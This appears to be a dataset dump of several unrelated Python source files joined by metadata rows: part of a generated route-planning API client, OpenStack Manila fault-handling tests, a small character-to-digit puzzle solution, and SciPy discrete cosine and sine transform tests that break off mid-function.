Force recompute the planning after parameter update.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: V01Planning
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `refresh_planning`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method refresh_planning" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}/refresh.{format}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Planning', auth_settings=auth_settings)
return response
def switch_vehicles(self, id, **kwargs):
"""
Switch two vehicles.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: str
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `switch_vehicles`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method switch_vehicles" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}/switch.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def update_stop(self, planning_id, route_id, id, **kwargs):
"""
Update stop.
:param int planning_id: (required)
:param int route_id: (required)
:param int id: (required)
:param bool active:
:return: str
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `update_stop`")
# verify the required parameter 'route_id' is set
if route_id is None:
raise ValueError("Missing the required parameter `route_id` when calling `update_stop`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `update_stop`")
all_params = ['planning_id', 'route_id', 'id', 'active']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method update_stop" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{route_id}/stops/{id}.{format}'.replace('{format}', 'json')
method = 'PUT'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'route_id' in params:
path_params['route_id'] = params['route_id']
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
if 'active' in params:
form_params['active'] = bytes(params['active'])
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def get_routes(self, planning_id, **kwargs):
"""
Fetch planning's routes.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: list[V01Route]
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `get_routes`")
all_params = ['planning_id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method get_routes" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes.{format}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='list[V01Route]', auth_settings=auth_settings)
return response
def get_route(self, planning_id, id, **kwargs):
"""
Fetch route.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:param int id: (required)
:return: V01Route
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `get_route`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `get_route`")
all_params = ['planning_id', 'id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method get_route" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{id}.{format}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Route', auth_settings=auth_settings)
return response
def update_route(self, planning_id, id, **kwargs):
"""
Update route.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:param int id: (required)
:param bool hidden:
:param bool locked:
:param str color:
:return: V01Route
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `update_route`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `update_route`")
all_params = ['planning_id', 'id', 'hidden', 'locked', 'color']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method update_route" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{id}.{format}'.replace('{format}', 'json')
method = 'PUT'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
if 'hidden' in params:
form_params['hidden'] = params['hidden']
if 'locked' in params:
form_params['locked'] = params['locked']
if 'color' in params:
form_params['color'] = params['color']
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Route', auth_settings=auth_settings)
return response
def activation_stops(self, planning_id, id, active, **kwargs):
"""
Change stops activation.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:param int id: (required)
:param str active: (required)
:return: V01Route
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `activation_stops`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `activation_stops`")
# verify the required parameter 'active' is set
if active is None:
raise ValueError("Missing the required parameter `active` when calling `activation_stops`")
all_params = ['planning_id', 'id', 'active']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method activation_stops" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{id}/active/{active}.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'id' in params:
path_params['id'] = params['id']
if 'active' in params:
path_params['active'] = params['active']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Route', auth_settings=auth_settings)
return response
def move_destinations(self, planning_id, id, destination_ids, **kwargs):
"""
Move destination to routes. Append in order at end.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:param str id: (required)
:param list[Integer] destination_ids: (required)
:return: str
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `move_destinations`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `move_destinations`")
# verify the required parameter 'destination_ids' is set
if destination_ids is None:
raise ValueError("Missing the required parameter `destination_ids` when calling `move_destinations`")
all_params = ['planning_id', 'id', 'destination_ids']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method move_destinations" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{id}/destinations/moves.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
if 'destination_ids' in params:
form_params['destination_ids'] = bytes(params['destination_ids'])
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(['multipart/form-data'])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def optimize_route(self, planning_id, id, **kwargs):
"""
Starts asynchronous route optimization.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:param int id: (required)
:return: str
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `optimize_route`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `optimize_route`")
all_params = ['planning_id', 'id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method optimize_route" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{id}/optimize.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
if 'planning_id' in params:
form_params['planning_id'] = params['planning_id']
if 'id' in params:
form_params['id'] = params['id']
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def move_stop(self, planning_id, id, stop_id, index, **kwargs):
"""
Move stop position in routes.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:param str id: (required)
:param int stop_id: Stop id to move (required)
:param int index: New position in the route (required)
:return: str
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `move_stop`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `move_stop`")
# verify the required parameter 'stop_id' is set
if stop_id is None:
raise ValueError("Missing the required parameter `stop_id` when calling `move_stop`")
# verify the required parameter 'index' is set
if index is None:
raise ValueError("Missing the required parameter `index` when calling `move_stop`")
all_params = ['planning_id', 'id', 'stop_id', 'index']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method move_stop" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{id}/stops/{stop_id}/move/{index}.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'id' in params:
path_params['id'] = params['id']
if 'stop_id' in params:
path_params['stop_id'] = params['stop_id']
if 'index' in params:
path_params['index'] = params['index']
query_params = {}
header_params = {}
form_params = {}
if 'planning_id' in params:
form_params['planning_id'] = params['planning_id']
if 'id' in params:
form_params['id'] = params['id']
if 'stop_id' in params:
form_params['stop_id'] = params['stop_id']
if 'index' in params:
form_params['index'] = params['index']
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
| gpl-2.0 | -6,249,175,168,843,568,000 | 31.322182 | 132 | 0.558558 | false | 4.233473 | false | false | false |
vponomaryov/manila | manila/tests/api/middleware/test_faults.py | 1 | 4107 | # Copyright 2010 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_serialization import jsonutils
import six
import webob
import webob.dec
import webob.exc
from manila.api.openstack import wsgi
from manila import test
class TestFaults(test.TestCase):
"""Tests covering `manila.api.openstack.faults:Fault` class."""
def _prepare_xml(self, xml_string):
"""Remove characters from string which hinder XML equality testing."""
xml_string = xml_string.replace(" ", "")
xml_string = xml_string.replace("\n", "")
xml_string = xml_string.replace("\t", "")
return xml_string
def test_400_fault_json(self):
"""Test fault serialized to JSON via file-extension and/or header."""
requests = [
webob.Request.blank('/.json'),
webob.Request.blank('/', headers={"Accept": "application/json"}),
]
for request in requests:
fault = wsgi.Fault(webob.exc.HTTPBadRequest(explanation='scram'))
response = request.get_response(fault)
expected = {
"badRequest": {
"message": "scram",
"code": 400,
},
}
actual = jsonutils.loads(response.body)
self.assertEqual("application/json", response.content_type)
self.assertEqual(expected, actual)
def test_413_fault_json(self):
"""Test fault serialized to JSON via file-extension and/or header."""
requests = [
webob.Request.blank('/.json'),
webob.Request.blank('/', headers={"Accept": "application/json"}),
]
for request in requests:
exc = webob.exc.HTTPRequestEntityTooLarge
fault = wsgi.Fault(exc(explanation='sorry',
headers={'Retry-After': 4}))
response = request.get_response(fault)
expected = {
"overLimit": {
"message": "sorry",
"code": 413,
"retryAfter": 4,
},
}
actual = jsonutils.loads(response.body)
self.assertEqual("application/json", response.content_type)
self.assertEqual(expected, actual)
def test_raise(self):
"""Ensure the ability to raise :class:`Fault` in WSGI-ified methods."""
@webob.dec.wsgify
def raiser(req):
raise wsgi.Fault(webob.exc.HTTPNotFound(explanation='whut?'))
req = webob.Request.blank('/.json')
resp = req.get_response(raiser)
self.assertEqual("application/json", resp.content_type)
self.assertEqual(404, resp.status_int)
self.assertIn(six.b('whut?'), resp.body)
def test_raise_403(self):
"""Ensure the ability to raise :class:`Fault` in WSGI-ified methods."""
@webob.dec.wsgify
def raiser(req):
raise wsgi.Fault(webob.exc.HTTPForbidden(explanation='whut?'))
req = webob.Request.blank('/.json')
resp = req.get_response(raiser)
self.assertEqual("application/json", resp.content_type)
self.assertEqual(403, resp.status_int)
self.assertNotIn(six.b('resizeNotAllowed'), resp.body)
self.assertIn(six.b('forbidden'), resp.body)
def test_fault_has_status_int(self):
"""Ensure the status_int is set correctly on faults."""
fault = wsgi.Fault(webob.exc.HTTPBadRequest(explanation='what?'))
self.assertEqual(400, fault.status_int)
| apache-2.0 | -6,209,282,040,056,393,000 | 36 | 79 | 0.60263 | false | 4.22966 | true | false | false |
ProgDan/maratona | URI/uri2690.py | 1 | 1630 | class Main:
def __init__(self):
self.n = int(input())
self.s = ""
def change(self):
self.con = 0
for i in range(0, len(self.s)):
if self.con == 12:
break
elif self.s[i] in ['a', 'k', 'u', 'G', 'Q']:
print(0, end='')
self.con += 1
elif self.s[i] in ['b', 'l', 'v', 'I', 'S']:
print(1, end='')
self.con += 1
elif self.s[i] in ['c', 'm', 'w', 'E', 'O', 'Y']:
print(2, end='')
self.con += 1
elif self.s[i] in ['d', 'n', 'x', 'F', 'P', 'Z']:
print(3, end='')
self.con += 1
elif self.s[i] in ['e', 'o', 'y', 'J', 'T']:
print(4, end='')
self.con += 1
elif self.s[i] in ['f', 'p', 'z', 'D', 'N', 'X']:
print(5, end='')
self.con += 1
elif self.s[i] in ['g', 'q', 'A', 'K', 'U']:
print(6, end='')
self.con += 1
elif self.s[i] in ['h', 'r', 'C', 'M', 'W']:
print(7, end='')
self.con += 1
elif self.s[i] in ['i', 's', 'B', 'L', 'V']:
print(8, end='')
self.con += 1
elif self.s[i] in ['j', 't', 'H', 'R']:
print(9, end='')
self.con += 1
print()
def output(self):
for self.i in range(0, self.n):
self.s = input()
self.change()
if __name__ == '__main__':
obj = Main()
obj.output()
| gpl-3.0 | 6,681,451,894,900,894,000 | 30.960784 | 61 | 0.320245 | false | 3.306288 | false | false | false |
DailyActie/Surrogate-Model | 01-codes/scipy-master/scipy/fftpack/tests/test_real_transforms.py | 1 | 14903 | #!/usr/bin/env python
from __future__ import division, print_function, absolute_import
from os.path import join, dirname
import numpy as np
from numpy.testing import assert_array_almost_equal, assert_equal, TestCase
from scipy.fftpack.realtransforms import dct, idct, dst, idst
# Matlab reference data
MDATA = np.load(join(dirname(__file__), 'test.npz'))
X = [MDATA['x%d' % i] for i in range(8)]
Y = [MDATA['y%d' % i] for i in range(8)]
# FFTW reference data: the data are organized as follows:
# * SIZES is an array containing all available sizes
# * for every type (1, 2, 3, 4) and every size, the array dct_type_size
# contains the output of the DCT applied to the input np.linspace(0, size-1,
# size)
FFTWDATA_DOUBLE = np.load(join(dirname(__file__), 'fftw_double_ref.npz'))
FFTWDATA_SINGLE = np.load(join(dirname(__file__), 'fftw_single_ref.npz'))
FFTWDATA_SIZES = FFTWDATA_DOUBLE['sizes']
def fftw_dct_ref(type, size, dt):
x = np.linspace(0, size - 1, size).astype(dt)
dt = np.result_type(np.float32, dt)
if dt == np.double:
data = FFTWDATA_DOUBLE
elif dt == np.float32:
data = FFTWDATA_SINGLE
else:
raise ValueError()
y = (data['dct_%d_%d' % (type, size)]).astype(dt)
return x, y, dt
def fftw_dst_ref(type, size, dt):
x = np.linspace(0, size - 1, size).astype(dt)
dt = np.result_type(np.float32, dt)
if dt == np.double:
data = FFTWDATA_DOUBLE
elif dt == np.float32:
data = FFTWDATA_SINGLE
else:
raise ValueError()
y = (data['dst_%d_%d' % (type, size)]).astype(dt)
return x, y, dt
class TestComplex(TestCase):
def test_dct_complex64(self):
y = dct(1j * np.arange(5, dtype=np.complex64))
x = 1j * dct(np.arange(5))
assert_array_almost_equal(x, y)
def test_dct_complex(self):
y = dct(np.arange(5) * 1j)
x = 1j * dct(np.arange(5))
assert_array_almost_equal(x, y)
def test_idct_complex(self):
y = idct(np.arange(5) * 1j)
x = 1j * idct(np.arange(5))
assert_array_almost_equal(x, y)
def test_dst_complex64(self):
y = dst(np.arange(5, dtype=np.complex64) * 1j)
x = 1j * dst(np.arange(5))
assert_array_almost_equal(x, y)
def test_dst_complex(self):
y = dst(np.arange(5) * 1j)
x = 1j * dst(np.arange(5))
assert_array_almost_equal(x, y)
def test_idst_complex(self):
y = idst(np.arange(5) * 1j)
x = 1j * idst(np.arange(5))
assert_array_almost_equal(x, y)
class _TestDCTBase(TestCase):
def setUp(self):
self.rdt = None
self.dec = 14
self.type = None
def test_definition(self):
for i in FFTWDATA_SIZES:
x, yr, dt = fftw_dct_ref(self.type, i, self.rdt)
y = dct(x, type=self.type)
assert_equal(y.dtype, dt)
# XXX: we divide by np.max(y) because the tests fail otherwise. We
# should really use something like assert_array_approx_equal. The
# difference is due to fftw using a better algorithm w.r.t error
# propagation compared to the ones from fftpack.
assert_array_almost_equal(y / np.max(y), yr / np.max(y), decimal=self.dec,
err_msg="Size %d failed" % i)
def test_axis(self):
nt = 2
for i in [7, 8, 9, 16, 32, 64]:
x = np.random.randn(nt, i)
y = dct(x, type=self.type)
for j in range(nt):
assert_array_almost_equal(y[j], dct(x[j], type=self.type),
decimal=self.dec)
x = x.T
y = dct(x, axis=0, type=self.type)
for j in range(nt):
assert_array_almost_equal(y[:, j], dct(x[:, j], type=self.type),
decimal=self.dec)
class _TestDCTIIBase(_TestDCTBase):
def test_definition_matlab(self):
# Test correspondance with matlab (orthornomal mode).
for i in range(len(X)):
dt = np.result_type(np.float32, self.rdt)
x = np.array(X[i], dtype=dt)
yr = Y[i]
y = dct(x, norm="ortho", type=2)
assert_equal(y.dtype, dt)
assert_array_almost_equal(y, yr, decimal=self.dec)
class _TestDCTIIIBase(_TestDCTBase):
def test_definition_ortho(self):
# Test orthornomal mode.
for i in range(len(X)):
x = np.array(X[i], dtype=self.rdt)
dt = np.result_type(np.float32, self.rdt)
y = dct(x, norm='ortho', type=2)
xi = dct(y, norm="ortho", type=3)
assert_equal(xi.dtype, dt)
assert_array_almost_equal(xi, x, decimal=self.dec)
class TestDCTIDouble(_TestDCTBase):
def setUp(self):
self.rdt = np.double
self.dec = 10
self.type = 1
class TestDCTIFloat(_TestDCTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 5
self.type = 1
class TestDCTIInt(_TestDCTBase):
def setUp(self):
self.rdt = int
self.dec = 5
self.type = 1
class TestDCTIIDouble(_TestDCTIIBase):
def setUp(self):
self.rdt = np.double
self.dec = 10
self.type = 2
class TestDCTIIFloat(_TestDCTIIBase):
def setUp(self):
self.rdt = np.float32
self.dec = 5
self.type = 2
class TestDCTIIInt(_TestDCTIIBase):
def setUp(self):
self.rdt = int
self.dec = 5
self.type = 2
class TestDCTIIIDouble(_TestDCTIIIBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 3
class TestDCTIIIFloat(_TestDCTIIIBase):
def setUp(self):
self.rdt = np.float32
self.dec = 5
self.type = 3
class TestDCTIIIInt(_TestDCTIIIBase):
def setUp(self):
self.rdt = int
self.dec = 5
self.type = 3
class _TestIDCTBase(TestCase):
def setUp(self):
self.rdt = None
self.dec = 14
self.type = None
def test_definition(self):
for i in FFTWDATA_SIZES:
xr, yr, dt = fftw_dct_ref(self.type, i, self.rdt)
x = idct(yr, type=self.type)
if self.type == 1:
x /= 2 * (i - 1)
else:
x /= 2 * i
assert_equal(x.dtype, dt)
# XXX: we divide by np.max(y) because the tests fail otherwise. We
# should really use something like assert_array_approx_equal. The
# difference is due to fftw using a better algorithm w.r.t error
# propagation compared to the ones from fftpack.
assert_array_almost_equal(x / np.max(x), xr / np.max(x), decimal=self.dec,
err_msg="Size %d failed" % i)
class TestIDCTIDouble(_TestIDCTBase):
def setUp(self):
self.rdt = np.double
self.dec = 10
self.type = 1
class TestIDCTIFloat(_TestIDCTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 4
self.type = 1
class TestIDCTIInt(_TestIDCTBase):
def setUp(self):
self.rdt = int
self.dec = 4
self.type = 1
class TestIDCTIIDouble(_TestIDCTBase):
def setUp(self):
self.rdt = np.double
self.dec = 10
self.type = 2
class TestIDCTIIFloat(_TestIDCTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 5
self.type = 2
class TestIDCTIIInt(_TestIDCTBase):
def setUp(self):
self.rdt = int
self.dec = 5
self.type = 2
class TestIDCTIIIDouble(_TestIDCTBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 3
class TestIDCTIIIFloat(_TestIDCTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 5
self.type = 3
class TestIDCTIIIInt(_TestIDCTBase):
def setUp(self):
self.rdt = int
self.dec = 5
self.type = 3
class _TestDSTBase(TestCase):
def setUp(self):
self.rdt = None # dtype
self.dec = None # number of decimals to match
self.type = None # dst type
def test_definition(self):
for i in FFTWDATA_SIZES:
xr, yr, dt = fftw_dst_ref(self.type, i, self.rdt)
y = dst(xr, type=self.type)
assert_equal(y.dtype, dt)
# XXX: we divide by np.max(y) because the tests fail otherwise. We
# should really use something like assert_array_approx_equal. The
# difference is due to fftw using a better algorithm w.r.t error
# propagation compared to the ones from fftpack.
assert_array_almost_equal(y / np.max(y), yr / np.max(y), decimal=self.dec,
err_msg="Size %d failed" % i)
class TestDSTIDouble(_TestDSTBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 1
class TestDSTIFloat(_TestDSTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 5
self.type = 1
class TestDSTIInt(_TestDSTBase):
def setUp(self):
self.rdt = int
self.dec = 5
self.type = 1
class TestDSTIIDouble(_TestDSTBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 2
class TestDSTIIFloat(_TestDSTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 6
self.type = 2
class TestDSTIIInt(_TestDSTBase):
def setUp(self):
self.rdt = int
self.dec = 6
self.type = 2
class TestDSTIIIDouble(_TestDSTBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 3
class TestDSTIIIFloat(_TestDSTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 7
self.type = 3
class TestDSTIIIInt(_TestDSTBase):
def setUp(self):
self.rdt = int
self.dec = 7
self.type = 3
class _TestIDSTBase(TestCase):
def setUp(self):
self.rdt = None
self.dec = None
self.type = None
def test_definition(self):
for i in FFTWDATA_SIZES:
xr, yr, dt = fftw_dst_ref(self.type, i, self.rdt)
x = idst(yr, type=self.type)
if self.type == 1:
x /= 2 * (i + 1)
else:
x /= 2 * i
assert_equal(x.dtype, dt)
# XXX: we divide by np.max(x) because the tests fail otherwise. We
# should really use something like assert_array_approx_equal. The
# difference is due to fftw using a better algorithm w.r.t error
# propagation compared to the ones from fftpack.
assert_array_almost_equal(x / np.max(x), xr / np.max(x), decimal=self.dec,
err_msg="Size %d failed" % i)
class TestIDSTIDouble(_TestIDSTBase):
def setUp(self):
self.rdt = np.double
self.dec = 12
self.type = 1
class TestIDSTIFloat(_TestIDSTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 4
self.type = 1
class TestIDSTIInt(_TestIDSTBase):
def setUp(self):
self.rdt = int
self.dec = 4
self.type = 1
class TestIDSTIIDouble(_TestIDSTBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 2
class TestIDSTIIFloat(_TestIDSTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 6
self.type = 2
class TestIDSTIIInt(_TestIDSTBase):
def setUp(self):
self.rdt = int
self.dec = 6
self.type = 2
class TestIDSTIIIDouble(_TestIDSTBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 3
class TestIDSTIIIFloat(_TestIDSTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 6
self.type = 3
class TestIDSTIIIInt(_TestIDSTBase):
def setUp(self):
self.rdt = int
self.dec = 6
self.type = 3
class TestOverwrite(object):
"""Check input overwrite behavior """
real_dtypes = [np.float32, np.float64]
def _check(self, x, routine, type, fftsize, axis, norm, overwrite_x,
should_overwrite, **kw):
x2 = x.copy()
routine(x2, type, fftsize, axis, norm, overwrite_x=overwrite_x)
sig = "%s(%s%r, %r, axis=%r, overwrite_x=%r)" % (
routine.__name__, x.dtype, x.shape, fftsize, axis, overwrite_x)
if not should_overwrite:
assert_equal(x2, x, err_msg="spurious overwrite in %s" % sig)
def _check_1d(self, routine, dtype, shape, axis, overwritable_dtypes):
np.random.seed(1234)
if np.issubdtype(dtype, np.complexfloating):
data = np.random.randn(*shape) + 1j * np.random.randn(*shape)
else:
data = np.random.randn(*shape)
data = data.astype(dtype)
for type in [1, 2, 3]:
for overwrite_x in [True, False]:
for norm in [None, 'ortho']:
if type == 1 and norm == 'ortho':
continue
should_overwrite = (overwrite_x
and dtype in overwritable_dtypes
and (len(shape) == 1 or
(axis % len(shape) == len(shape) - 1
)))
self._check(data, routine, type, None, axis, norm,
overwrite_x, should_overwrite)
def test_dct(self):
overwritable = self.real_dtypes
for dtype in self.real_dtypes:
self._check_1d(dct, dtype, (16,), -1, overwritable)
self._check_1d(dct, dtype, (16, 2), 0, overwritable)
self._check_1d(dct, dtype, (2, 16), 1, overwritable)
def test_idct(self):
overwritable = self.real_dtypes
for dtype in self.real_dtypes:
self._check_1d(idct, dtype, (16,), -1, overwritable)
self._check_1d(idct, dtype, (16, 2), 0, overwritable)
self._check_1d(idct, dtype, (2, 16), 1, overwritable)
def test_dst(self):
overwritable = self.real_dtypes
